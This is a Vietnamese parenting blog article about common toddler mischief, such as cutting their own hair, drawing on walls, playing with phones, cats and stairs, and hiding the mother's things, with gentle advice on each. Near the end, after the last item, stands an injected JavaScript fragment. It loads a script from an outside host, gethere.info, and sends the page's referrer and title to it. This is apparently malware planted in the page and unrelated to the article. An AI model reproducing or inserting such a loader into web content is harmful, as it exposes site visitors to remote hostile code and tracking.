Những trò “tiêu khiển” kinh điển của bé

1. Bé rất muốn tự cắt tóc của mình

Tính tò mò sẽ khiến bé rất hay nghịch ngợm mái tóc của mình. Nếu chỉ cần có chiếc kéo mẹ để quên ở đâu đó mà bé nhìn thấy, bé sẽ sẵn sàng hí hoáy tự xử mái tóc lơ thơ của mình.
2. Bé muốn kéo đu rèm cửa
Dù mẹ có nhắc nhở bao nhiêu lần rằng không được chơi trò này vì có thể chân rèm cửa sẽ đứt hay các cột rèm sẽ đổ thì đó vẫn là trò ưa thích của bé. Với bé, đu trên những tấm rèm và tưởng tượng mình giống tác-giăng là điều cực kì thú vị.
3. Bé thích bôi kem đánh răng lên tường nhà tắm và vẽ lung tung lên tường
Trí tưởng tượng và sức sáng tạo của bé sẽ là không có giới hạn. Bất cứ nơi nào có bút chì, bút màu là bé có thể vẽ ở chỗ đó, hoặc bôi kem đánh răng lung tung lên tường nhà tắm khi bạn không để ý. Mẹ cũng đừng nên cấm đoán vì có thể hạn chế sự sáng tạo đang phát triển của trẻ. Nếu có điều kiện, mẹ hãy dành 1 phòng riêng cho bé để bé có thể vui chơi, hoặc mẹ có thể mua những tờ giấy trắng khổ to về cho bé được thỏa thích vẽ vời.
child-drawing_00436497-a59e2
4. Bé muốn viết vẽ linh tinh vào cuốn sổ làm việc của bạn
Bé có giấy vẽ của mình rồi, nhưng đối với những đứa trẻ, giấy vẽ của mình và trang giấy trong sổ của mẹ lại khác nhau. Bé có thể vẽ tranh lên giấy vẽ riêng của chúng, nhưng đối với sổ làm việc hay nhật ký của bạn, chúng lại muốn vẽ riêng những bức tranh và ghi chú ngộ nghĩnh chỉ dành riêng cho bạn mà thôi. Tất nhiên không chỉ có vậy, một lý do nữa là bé muốn nghịch ngợm những đồ riêng tư của mẹ.
5. Bé muốn lôi xe đạp hay đồ chơi vòng quanh hoặc lên cầu thang
Cảnh báo của mẹ rằng lôi đồ chơi có bánh xe lên cầu thang rất nguy hiểm sẽ không tồn tại trong đầu bé lâu. Lúc đó, bé chỉ quan tâm một điều rằng: “Những thứ này sẽ rơi từ trên cầu thang xuống đất nhanh đến thế nào nhỉ?”.
6. Bé muốn tự mình gọi điện thoại
Trẻ con rất hiếu kỳ với điện thoại của mẹ và rất tò mò muốn sử dụng chúng để bấm nghịch hay tự gọi điện thoại. “Bé nhà mình là một điển hình. Vì điện thoại của mình để phím gọi nhanh cho những số máy quan trọng để gọi khi cần thiết, nên khi bé cầm điện thoại rất hay bấm gọi lung tung”. Chị Hà (nhân viên ngân hàng, Bắc Ninh) chia sẻ.
Có những trường hợp khác, bé còn thông minh hơn, tra được cả những số điện thoại trong danh bạ rồi khi mẹ không để ý, bé hồn nhiên bấm gọi cho bạn bè, đồng nghiệp, hay thậm chí là khách hàng hay sếp của mẹ.
Với trường hợp này, mẹ nên để xa máy điện thoại khỏi tầm với trẻ để hạn chế trẻ hiếu động, nghịch ngợm có thể gây ra những điều phiền phức như vậy. Tuy nhiên khi trẻ đã lớn một chút và ý thức được rồi, thì mẹ có thể dạy trẻ tự mình gọi điện, nghe điện khi cần thiết.
Những trò "tiêu khiển" kinh điển của bé 2
7. Bé thích chơi với mèo
Khi nhìn thấy mèo, một số bé có thể rụt rè nhưng số khác thì vô cùng tò mò và thích thú với những chú mèo láu lỉnh, leo trèo lung tung đang thu hút sự chú ý. Bé không chỉ thích chơi, rượt đuổi, mà còn thích mặc đồ của búp bê, quàng khăn, gắn những thứ đồ linh tinh vào cổ mèo. Mẹ có thể khuyến khích bé yêu thương động vật và chơi với chúng, tuy nhiên, một số bé nếu mắc bệnh đường hô hấp thì không nên ở gần mèo vì có thể ảnh hưởng không tốt đến sức khỏe.
8. Bé giấu đồ của mẹ
Nếu như có một lúc nào đó, bạn bới tung cả nhà lên mà vẫn không thấy điện thoại, thỏi son hay thậm chí là chìa khóa tủ của mình ở đâu, thì rất có thể thủ phạm chính là người bạn bé nhỏ mặt đang tỉnh bơ chơi đồ chơi đấy. Có thể bé sẽ chẳng nghĩ gì nghiêm trọng khi làm việc đó, chỉ đơn giản rằng muốn trêu mẹ, hoặc cầm chơi nhưng rồi lại để quên đâu mất mà không nhớ ra.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; .

2,743 lượt xem, 2 views todayTrả lời

Thư điện tử của bạn sẽ không được hiện thị công khai. Các trường bắt buộc được đánh dấu *

Bạn có thể sử dụng các thẻ HTML và thuộc tính sau: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>